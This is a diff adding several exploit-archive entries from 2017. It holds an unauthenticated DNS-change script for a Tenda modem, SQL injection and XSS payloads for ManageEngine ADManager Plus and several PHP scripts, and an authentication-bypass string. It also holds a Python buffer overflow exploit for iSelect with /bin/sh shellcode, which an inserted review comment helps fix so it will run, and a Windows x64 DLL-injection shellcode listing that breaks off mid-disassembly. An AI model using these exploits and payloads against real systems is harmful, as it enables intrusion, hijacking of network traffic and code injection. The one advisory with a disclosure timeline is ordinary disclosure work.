+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Tenda ADSL2/2+ Modem D840R "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
diff --git a/platforms/java/webapps/41082.txt b/platforms/java/webapps/41082.txt
new file mode 100755
index 000000000..08823e556
--- /dev/null
+++ b/platforms/java/webapps/41082.txt
@@ -0,0 +1,191 @@
+1. ADVISORY INFORMATION
+========================================
+Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
+Application: ManagEnegine Admanager
+Remotely Exploitable: Yes
+Authentication Required: Yes
+Versions Affected: <= 6.5.40
+Technology: Java
+Vendor URL: https://www.manageengine.com/products/ad-manager/
+Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
+Author: Mehmet Ince
+Date of found: 08 Jan 2017
+
+2. CREDIT
+========================================
+Those vulnerabilities was identified during internal penetration test
+by Mehmet INCE from PRODAFT / INVICTUS.
+
+3. DETAILS
+========================================
+
+3.1 Authenticated Second Order SQL Injection
+-----------------------------------------
+AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint.
+start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)
+
+public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
+ {
+ try
+ {
+ ... OMITTED ...
+
+ this.attrbId = request.getParameter("attrId");
+ this.tableName = request.getParameter("attrTabName");
+ this.attrbName = request.getParameter("attrbColName");
+
+ ... OMITTED ...
+ }
+ catch (Exception e)
+ {
+ e.printStackTrace();
+ }
+ }
+
+It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
+And then deriveData function are going to be called with class variables that under the adversary control
+during complatedAction function execution.
+
+public void completedAction()
+{
+ if (this.updateDetails)
+ {
+ ... OMITTED ...
+
+ deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);
+
+ ... OMITTED ...
+ }
+ ... OMITTED ...
+}
+
+deriveData function definition is as follow.
+
+public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
+ {
+ ArrayList list = new ArrayList();
+ RelationalAPI relationalAPI = RelationalAPI.getInstance();
+ Connection connection = null;
+ try
+ {
+ TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
+ ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
+ String dataType = colDef.getDataType();
+ String selctAttrbCol_defaultValue = "'-'";
+ if (!dataType.equals("CHAR")) {
+ ... OMITTED ...
+ }
+ String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
+ if (!tableName.equalsIgnoreCase(this.baseTableName))
+ {
+ String selctAttrbCol = tableName + "." + attrbName;
+ String parentAttrbCol = this.baseTableName + ".domain_name";
+
+ String parentTable = this.baseTableName;String childTable = tableName;
+ String parentJoinCol = this.baseTableName + ".object_guid";
+ String childJoinCol = tableName + ".object_guid";
+
+ String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";
+
+ query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
+ }
+ ArrayList result = getResult(query, attrbName);
+
+ ArrayList subList = new ArrayList();
+ if (result.size() > 0)
+ {
+ ... OMITTED ...
+ }
+ if (subList.size() > 0)
+ {
+ ... OMITTED ...
+
+ }
+ else
+ {
+ ... OMITTED ...
+ }
+ }
+ catch (Exception e)
+ {
+ e.printStackTrace();
+ }
+ }
+
+As you can see, database query built with user supplied variable without PDO/ORM.
+
+POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
+Vulnerable Parameters: attrTabName, attrbColName
+
+IMPORTANT NOTE:
+Since whole process are being called as background job, there is no way to successfully exploitation
+with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
+exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)
+
+3.2 Reflected Cross-Site Scripting Issues
+-----------------------------------------
+
+Issue #1
+POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
+Parameters: domainName
+
+Issue #2
+POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"-->&init=true
+Vulnerable Parameters: action
+
+Issue #3
+POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"-->
+Vulnerable Parameters: domainName
+
+Issue #4
+POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9)
+Vulnerable Parameters: waadAccId
+
+Issue #5
+POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"-->
+Vulnerable Parameters: actionType
+
+Issue #6
+POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"-->&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
+Vulnerable Parameters: objectClass, domainName
+
+Issue #7
+POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"-->&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
+Vulnerable Parameters: domainName, id, container
+
+Issue #8
+POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"-->&tileName=Compliance Reports
+Vulnerable Parameters: reportTab, tileName, categoryId,
+
+Issue #9
+POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"-->&distinguishedName=DC=acme,DC=local
+Vulnerable Parameters: domainName, distinguishedName
+
+Issue #10
+POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"-->&permissionType=folder
+Vulnerable Parameters: permissionType, domianName
+
+Issue #11
+POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"-->
+Vulnerable Parameters: textField
+
+Issue #12
+POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
+Vulnerable Parameters: defaultNamingContext,modelName, showDomain
+
+Issue #13
+POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"-->&beanName=undefined&type=single
+Vulnerable Parameters: modifyType, beanName
+
+
+4. TIMELINE
+========================================
+06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
+07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
+07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
+08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
+09 Jan 2017 - Vendor notified.
+09 Jan 2017 - Vendor acknowledge the report.
+13 Jan 2017 - Vendor replied with patch.
+13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
+16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)
diff --git a/platforms/linux/local/41076.py b/platforms/linux/local/41076.py
new file mode 100755
index 000000000..f74f487c6
--- /dev/null
+++ b/platforms/linux/local/41076.py
@@ -0,0 +1,63 @@
+# Exploit developed using Exploit Pack v7.01
+# Exploit Author: Juan Sacco - http://www.exploitpack.com -
+jsacco@exploitpack.com
+# Program affected: iSelect
+# Affected value: -k, --key=KEY
+# Version: 1.4.0-2+b1
+#
+# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
+# Program description: ncurses-based interactive line selection tool
+# iSelect is an interactive line selection tool, operating via a
+# full-screen Curses-based terminal session.
+
+# Kali Linux 2.0 package: pool/main/i/iselect/iselect_1.4.0-2+b1_i386.deb
+# MD5sum: d5ace58e0f463bb09718d97ff6516c24
+# Website: http://www.ossp.org/pkg/tool/iselect/
+
+# Where in the code:
+#7 0xb7eaa69f in __strcpy_chk (dest=0xbfffeccc
+"1\243\376\267\070\360\377\277", src=0xbffff388 "=", 'A' ..., destlen=1024) at strcpy_chk.c:30
+#8 0x0804bfaa in ?? ()
+#9 0x0804914d in ?? ()
+#10 0xb7dcd276 in __libc_start_main (main=0x8048f50, argc=2,
+argv=0xbffff224, init=0x804c020, fini=0x804c090, rtld_fini=0xb7fea8a0
+<_dl_fini>, stack_end=0xbffff21c) at ../csu/libc-start.c:291
+
+
+# Exploit code: Proof of Concept ( Without Fortify )
+import os, subprocess
+
+def run():
+ try:
+ print "# iSelect - Local Buffer Overflow by Juan Sacco"
+ print "# This Exploit has been developed using Exploit Pack -
+http://exploitpack.com"
+ # NOPSLED + SHELLCODE + EIP
+
+ buffersize = 1024
+ nopsled = "\x90"*30
+ shellcode =
+"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ eip = "\x08\xec\xff\xbf"
+ buffer = nopsled * (buffersize-len(shellcode)) + eip
+ subprocess.call(["iselect -k=",'', buffer])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "Sorry, iSelect binary - Not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Snap! Something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit iSelect - Local Overflow Exploit"
+ print "Author: Juan Sacco - Exploit Pack"
+ except IndexError:
+ howtousage()
+run()
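Review bot: `howtousage()` calls `sys.exit(-1)` but the file only imports `os` and `subprocess`, so reaching that path raises NameError instead of exiting; the import line should read `import os, subprocess, sys`. The `os.errno.ENOENT` comparison in the `except OSError` branch relies on Python 2's `os` module re-exporting `errno`, which later interpreters no longer do, so `import errno` with `e.errno == errno.ENOENT` is the portable spelling. The final `run()` sits outside the `if __name__ == '__main__':` block and therefore also runs on import; it belongs indented under the guard. The second `print` and the `shellcode =` assignment appear to be wrapped mid-statement in this rendering, so the file as shown would not parse as-is.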
diff --git a/platforms/php/webapps/41075.txt b/platforms/php/webapps/41075.txt
new file mode 100755
index 000000000..ea7567073
--- /dev/null
+++ b/platforms/php/webapps/41075.txt
@@ -0,0 +1,26 @@
+# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
+Persistent Cross Site Scripting
+# Author : ----------------- : Ahmet Gurel
+# Google Dork : --------- : -
+# Date : -------------------- : 16/01/2017
+# Type : -------------------- : webapps
+# Platform : --------------- : PHP
+# Vendor Homepage : http://itechscripts.com/business-networking-script/
+# Sofware Price and Demo : $299.00
+http://professional-network.itechscripts.com
+
+ ########## 1-SQL Injection ##########
+
+##### Vulnerable Parameter Type : GET
+##### Vulnerable Parameter : gid
+##### Vulnerable URL :
+http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
+##### SQLi Parameter : ' OR '1'='1
+
+
+
+########## 2-Persistent XSS Payload ##########
+
+##### Vulnerable URL : http://localhost/[PATH]/home.php
+##### Vuln. Parameter: first_name=
+##### PAYLOAD : '"-->
diff --git a/platforms/php/webapps/41080.txt b/platforms/php/webapps/41080.txt
new file mode 100755
index 000000000..ff435cc52
--- /dev/null
+++ b/platforms/php/webapps/41080.txt
@@ -0,0 +1,64 @@
+Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
+Author : Hasan Emre Ozer
+Google Dork : -
+Date : 16/01/2017
+Type : webapps
+Platform: PHP
+Vendor Homepage : http://itechscripts.com/image-sharing-script/
+Sofware Price and Demo : $1250
+http://photo-sharing.itechscripts.com/
+
+--------------------------------
+Type: Reflected XSS
+Vulnerable URL: http://localhost/[PATH]/searchpin.php
+Vulnerable Parameters : q=
+Payload:">
+-------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
+Vulnerable Parameters: pid
+Method: GET
+Payload: ' AND (SELECT 2674 FROM(SELECT
+COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+-------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/categorypage.php
+Vulnerable Parameters: token
+Method: GET
+Payload: ' AND (SELECT 2674 FROM(SELECT
+COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+
+--------------------------------
+Type: Reflected XSS
+Vulnerable URL: http://localhost/[PATH]/categorypage.php
+Vulnerable Parameters : token
+Payload:">
+
+-------------------------------
+Type: Stored XSS
+Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
+Method: POST
+Vulnerable Parameters : &text=
+Payload:
+--------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
+Vulnerable Parameters: id
+Method: POST
+Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+---------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
+Vulnerable Parameters: brdId
+Method: POST
+Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
+(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
+
+
diff --git a/platforms/php/webapps/41081.txt b/platforms/php/webapps/41081.txt
new file mode 100755
index 000000000..e834c4ef5
--- /dev/null
+++ b/platforms/php/webapps/41081.txt
@@ -0,0 +1,12 @@
+# # # # #
+# Vulnerability: Authentication Bypass
+# Date: 16.01.2017
+# Vendor Homepage: http://e-topbiz.com/
+# Script Name: Million Pixels 3
+# Script Buy Now: http://www.e-topbiz.com/oprema/pages/millionpixels3.php
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# # # # #
\ No newline at end of file
diff --git a/platforms/win_x86-64/shellcode/41072.c b/platforms/win_x86-64/shellcode/41072.c
new file mode 100755
index 000000000..cc5e25724
--- /dev/null
+++ b/platforms/win_x86-64/shellcode/41072.c
@@ -0,0 +1,692 @@
+/*
+
+ Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
+ Size: 584 bytes
+ Date: 16-01-2017
+ Author: Roziul Hasan Khan Shifat
+ Tested On : Windows 7 x64
+
+
+
+
+
+
+*/
+
+
+
+//Note : i wrtie it for process injection
+//It may work in exploit
+
+
+
+/*
+
+section .text
+ global _start
+_start:
+xor r8,r8
+push r8
+push r8
+
+mov [rsp],dword 'expl'
+mov [rsp+4],dword 'orer'
+mov [rsp+8],dword '.exe'
+
+lea rcx,[rsp] ;;process name (explorer.exe) change it if U want
+
+
+push r8
+push r8
+push r8
+
+
+
+mov [rsp],dword 'C:\U'
+mov [rsp+4],dword 'sers'
+mov [rsp+8],dword '\Pub'
+mov [rsp+12],dword 'lic\'
+mov [rsp+16],dword 'in.d'
+mov [rsp+20],word 'll'
+
+lea rdx,[rsp] ;path of the dll (change it to U full path of dll)
+
+
+
+
+;--------------------------------------------------------
+
+mov r8w,336
+
+sub rsp,r8
+lea r12,[rsp]
+
+push 24
+pop r8 ;(important: length of dll path string including null byte)
+
+
+mov [r12],rcx ;process name
+mov [r12+8],rdx ;dll path
+mov [r12+16],r8 ;length of dll path string
+
+;----------------------------------------------------------
+
+
+
+
+
+_main:
+
+cdq
+mov rax,[gs:rdx+0x60] ;peb
+mov rax,[rax+0x18] ;peb->Ldr
+mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
+lodsq
+mov rsi,[rax]
+mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address
+
+
+
+;------------------------------------------
+mov dl,0x88
+mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
+add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
+mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
+add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)
+
+mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
+add rsi,rdi
+
+;-------------------------------------------------------
+;loading msvcrt.dll
+cdq
+push rdx
+mov dx,832
+mov ebx,[rsi+rdx*4]
+add rbx,rdi
+
+
+mov [rsp],dword 'msvc'
+mov [rsp+4],word 'rt'
+
+lea rcx,[rsp]
+
+sub rsp,88
+
+call rbx
+
+;-------------------------------
+;Finding address of strcmp()
+
+lea rdx,[rsp+88]
+mov [rdx],dword 'strc'
+mov [rdx+4],word 'mp'
+
+mov rcx,rax
+
+mov r8w,587*4
+mov ebx,[rsi+r8]
+add rbx,rdi
+
+call rbx
+;-----------------------------
+mov [r12+24],rax ;address of strcmp()
+;---------------------------------------------------------------
+
+mov dx,190*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;CreateToolhelp32Snapshot()
+
+;--------------------------------
+
+;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
+xor rdx,rdx ;DWORD th32ProcessID
+push 2
+pop rcx ;DWORD dwFlags
+call rbx
+
+mov r13,rax ;HANDLE
+cmp r13,-1
+je __exit
+;---------------------------------------------
+mov dx,304
+
+mov [r12+32],dword edx ;sizeof PROCESSENTRY32
+
+
+
+mov dx,920*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;rbx=Process32First()
+
+;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
+
+lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
+mov rcx,r13 ;HANDLE hSnapshot
+
+
+call rbx
+
+cmp rax,1
+jne __exit
+
+;---------------------------------------------------
+
+xor rdx,rdx
+mov dx,922*4
+mov r15d,[rsi+rdx]
+add r15,rdi ;r15=Process32Next()
+
+
+
+sub rsp,88
+get_pid:
+lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
+mov rdx,[r12] ;process name
+mov rbx,[r12+24] ;strcmp()
+call rbx
+
+xor rdx,rdx
+cmp rax,rdx
+jz inject
+
+;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
+mov rcx,r13
+lea rdx,[r12+32]
+call r15
+
+cmp rax,1
+je get_pid
+
+leave
+ret
+
+
+
+
+
+
+
+
+
+
+__exit:
+xor rdx,rdx
+push rdx
+mov dx,297*4
+mov ebx,[rsi+rdx]
+add rbx,rdi
+
+pop rcx
+call rbx
+
+
+
+
+
+
+
+
+
+
+;--------------------------------------------------
+;------------------------------------------------------
+;inject function
+inject:
+
+xor rdx,rdx
+push rdx
+pop r10
+
+mov r10w,899*4
+mov ebx,[rsi+r10]
+add rbx,rdi ;rbx=OpenProcess()
+
+;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)
+
+push rdx
+pop rcx
+
+mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID
+
+;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)
+
+mov ecx,0x1e84800a
+sub ecx,0x1e65700b
+
+call rbx
+
+mov r13,rax ;PROCESS HANDLE
+cmp r13,-1
+je __exit
+;--------------------------------------------------------------------
+
+mov dx,1279
+mov ebx,[rsi+rdx*4]
+add rbx,rdi ;VirualAlloc()
+
+;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
+sub rsp,88
+
+mov rcx,r13 ;HANDLE hProcess
+xor rdx,rdx ;LPVOID lpAddress
+mov r8,[r12+16] ;SIZE_T dwSize
+mov r9w,0x2fff
+inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
+mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
+call rbx
+
+mov r14,rax ;LPVOID address
+xor rdx,rdx
+cmp rax,rdx
+jz __exit
+
+
+;-----------------------------------------------------------------------------------
+mov dx,1347
+mov ebx,[rsi+rdx*4]
+add rbx,rdi ;WriteProcessMemory()
+sub rsp,88
+xor rdx,rdx
+;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
+mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
+mov rcx,r13 ;HANDLE hProcess
+mov rdx,r14 ;LPVOID lpBaseAddress
+mov r8,[r12+8] ;LPCVOID lpBuffer
+mov r9,[r12+16] ;SIZE_T nSize
+
+call rbx
+
+
+
+cmp rax,1
+jne __exit
+
+;------------------------------------------------------------------------------------
+mov dx,170*4
+mov ebx,[rsi+rdx]
+add rbx,rdi ;CreateRemoteThread()
+
+xor rdx,rdx
+sub rsp,88
+;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
+
+mov rcx,r13 ;HANDLE hProcess
+push rdx
+push rdx
+pop r8 ;SIZE_T dwStackSize
+
+mov dx,832
+mov r9d,[rsi+rdx*4]
+add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())
+
+pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
+mov [rsp+32],r14 ;LPVOID lpParameter
+mov [rsp+40],r8
+mov [rsp+48],r8
+call rbx
+
+call __exit
+
+;------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+*/
+
+
+
+/*
+
+
+
+dll_inj.obj: file format pe-x86-64
+
+
+Disassembly of section .text:
+
+0000000000000000 <_start>:
+ 0: 4d 31 c0 xor %r8,%r8
+ 3: 41 50 push %r8
+ 5: 41 50 push %r8
+ 7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
+ e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
+ 15: 72
+ 16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
+ 1d: 65
+ 1e: 48 8d 0c 24 lea (%rsp),%rcx
+ 22: 41 50 push %r8
+ 24: 41 50 push %r8
+ 26: 41 50 push %r8
+ 28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
+ 2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
+ 36: 73
+ 37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
+ 3e: 62
+ 3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
+ 46: 5c
+ 47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
+ 4e: 64
+ 4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
+ 56: 48 8d 14 24 lea (%rsp),%rdx
+ 5a: 66 41 b8 50 01 mov $0x150,%r8w
+ 5f: 4c 29 c4 sub %r8,%rsp
+ 62: 4c 8d 24 24 lea (%rsp),%r12
+ 66: 6a 18 pushq $0x18
+ 68: 41 58 pop %r8
+ 6a: 49 89 0c 24 mov %rcx,(%r12)
+ 6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
+ 73: 4d 89 44 24 10 mov %r8,0x10(%r12)
+
+0000000000000078 <_main>:
+ 78: 99 cltd
+ 79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
+ 7e: 48 8b 40 18 mov 0x18(%rax),%rax
+ 82: 48 8b 70 10 mov 0x10(%rax),%rsi
+ 86: 48 ad lods %ds:(%rsi),%rax
+ 88: 48 8b 30 mov (%rax),%rsi
+ 8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
+ 8f: b2 88 mov $0x88,%dl
+ 91: 8b 5f 3c mov 0x3c(%rdi),%ebx
+ 94: 48 01 fb add %rdi,%rbx
+ 97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
+ 9a: 48 01 fb add %rdi,%rbx
+ 9d: 8b 73 1c mov 0x1c(%rbx),%esi
+ a0: 48 01 fe add %rdi,%rsi
+ a3: 99 cltd
+ a4: 52 push %rdx
+ a5: 66 ba 40 03 mov $0x340,%dx
+ a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ ac: 48 01 fb add %rdi,%rbx
+ af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
+ b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
+ bd: 48 8d 0c 24 lea (%rsp),%rcx
+ c1: 48 83 ec 58 sub $0x58,%rsp
+ c5: ff d3 callq *%rbx
+ c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
+ cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
+ d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
+ d8: 48 89 c1 mov %rax,%rcx
+ db: 66 41 b8 2c 09 mov $0x92c,%r8w
+ e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
+ e4: 48 01 fb add %rdi,%rbx
+ e7: ff d3 callq *%rbx
+ e9: 49 89 44 24 18 mov %rax,0x18(%r12)
+ ee: 66 ba f8 02 mov $0x2f8,%dx
+ f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ f5: 48 01 fb add %rdi,%rbx
+ f8: 48 31 d2 xor %rdx,%rdx
+ fb: 6a 02 pushq $0x2
+ fd: 59 pop %rcx
+ fe: ff d3 callq *%rbx
+ 100: 49 89 c5 mov %rax,%r13
+ 103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
+ 107: 74 60 je 169 <__exit>
+ 109: 66 ba 30 01 mov $0x130,%dx
+ 10d: 41 89 54 24 20 mov %edx,0x20(%r12)
+ 112: 66 ba 60 0e mov $0xe60,%dx
+ 116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 119: 48 01 fb add %rdi,%rbx
+ 11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
+ 121: 4c 89 e9 mov %r13,%rcx
+ 124: ff d3 callq *%rbx
+ 126: 48 83 f8 01 cmp $0x1,%rax
+ 12a: 75 3d jne 169 <__exit>
+ 12c: 48 31 d2 xor %rdx,%rdx
+ 12f: 66 ba 68 0e mov $0xe68,%dx
+ 133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
+ 137: 49 01 ff add %rdi,%r15
+ 13a: 48 83 ec 58 sub $0x58,%rsp
+
+000000000000013e :
+ 13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
+ 143: 49 8b 14 24 mov (%r12),%rdx
+ 147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
+ 14c: ff d3 callq *%rbx
+ 14e: 48 31 d2 xor %rdx,%rdx
+ 151: 48 39 d0 cmp %rdx,%rax
+ 154: 74 24 je 17a
